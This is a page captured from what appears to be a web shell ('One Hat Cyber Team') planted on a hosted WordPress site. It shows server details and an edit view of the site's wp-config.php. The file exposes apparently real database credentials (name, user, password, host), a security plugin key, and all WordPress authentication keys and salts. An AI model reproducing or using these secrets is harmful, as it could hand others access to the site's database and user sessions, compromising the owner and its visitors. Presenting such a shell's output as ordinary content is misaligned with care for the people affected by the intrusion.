⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.30
Server IP:
92.222.139.190
Server:
Linux webd002.cluster128.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
mspfmsm
/
stratinova
/
Edit File: wp-config.php
<?php /** Secure Error Suppression - Top Level */ // error_reporting( E_ALL & ~E_NOTICE & ~E_DEPRECATED & ~E_STRICT & ~E_USER_NOTICE & ~E_USER_DEPRECATED ); // define( 'WP_DEBUG', true ); // define( 'WP_DEBUG_LOG', true ); // define( 'WP_DEBUG_DISPLAY', true ); define( 'WP_CACHE', false /* Modified by NitroPack */ ); //Begin Really Simple Security session cookie settings @ini_set('session.cookie_httponly', true); @ini_set('session.cookie_secure', true); @ini_set('session.use_only_cookies', true); //END Really Simple Security cookie settings //Begin Really Simple Security key define('RSSSL_KEY', '0Rx0YdOqOVXrE5eZEB0Zwe8ltk52oZzJ0lJmC8fhZwmX4SiXlave5M1MABWeOQLw'); //END Really Simple Security key /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the website, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'mspfmsmnehos' ); /** Database username */ define( 'DB_USER', 'mspfmsmnehos' ); /** Database password */ define( 'DB_PASSWORD', 'Nehos72LmQa' ); /** Database hostname */ define( 'DB_HOST', 'mspfmsmnehos.mysql.db' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'p(Id~.5(&St9!c*F#0tyT$4BJMQJC@CWl?NwvUF4~5_Q=kSJ*qcWTN|LZv )I8?*' ); define( 'SECURE_AUTH_KEY', 'bbzic6Sh`7/i:#g*XUhJkviz3M]sS5Q@Zu*YltzEy^LC9vA#5e4URW=y@&|(??P/' ); define( 'LOGGED_IN_KEY', 'yzxc*NgFb[2$>^1fclOn%F76IjGy3Kl,8`4ry3`?q 67>h1BSd01vZrBm?,Fk2hD' ); define( 'NONCE_KEY', 'N <<1kxlBF!b<(i`v`Mi;O:LZ/kI#}#;jYo03RecPmCk=.X2myDDdyeohiq?4iTx' ); define( 'AUTH_SALT', ']U{EKU&%<M3#X<ck?D@y4#cgXapR44.08Ewtp)BAl`m2Y)fH@LCo+{dugUCGy9=6' ); define( 'SECURE_AUTH_SALT', '^VmE)ww%bAs-WE:OjPy{E4UO1 k<hENG 6T=YqP^go[#`S0Q+GvJVTuM`i3R1zno' ); define( 'LOGGED_IN_SALT', '{r[l]BtLL*4 (PBA-0>*?Hq[tMP2p(g4;9}#?A.QhCS}wv[.(Y0dWy7z[HmJ7zV(' ); define( 'NONCE_SALT', '3Nn|)El^} T-Nohm8$ak+gK93Dm#qK.Gi[*J,&V5~f.e6Xqv_OTYmyu5>C%t8v0X' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! * * At the installation time, database tables are created with the specified prefix. * Changing this value after WordPress is installed will make your site think * it has not been installed. * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix */ $table_prefix = 'wpstrat_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/ */ define( 'WP_DEBUG', false ); // define( 'WP_DEBUG_LOG', true ); // define( 'WP_DEBUG_DISPLAY', true ); // @header( 'X-Debug: Silencing notices' ); // error_reporting( E_ALL & ~E_NOTICE & ~E_DEPRECATED ); /* Add any custom values between this line and the "stop editing" line. */ define( 'DISALLOW_FILE_EDIT', false ); define( 'DISALLOW_FILE_MODS', false ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Simpan